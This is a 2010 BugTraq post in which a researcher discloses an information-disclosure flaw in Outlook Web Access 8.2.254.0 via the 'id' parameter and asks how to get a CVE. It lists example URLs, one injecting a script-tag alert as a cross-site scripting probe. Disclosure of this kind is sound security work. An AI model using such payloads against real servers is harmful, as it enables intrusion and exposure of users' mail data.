BugTraq
Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability May 20 2010 09:34PM
praveen_recker sify com (1 replies)
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
"Microsoft Outlook Web Access (OWA) version 8.2.254.0"
OS: Windows Server 2003
Internet Explorer 7
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
There is an information disclosure vulnerability in "Microsoft Outlook Web Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:
https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</s
cript>
https://example.com/owa/?ae=Folder&t=IPF.Note&id=
https://example.com/owa/?ae=Folder&t=IPF.Note&id=A

Whom to contact to get a CVE Identifier for this vulnerability.

Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus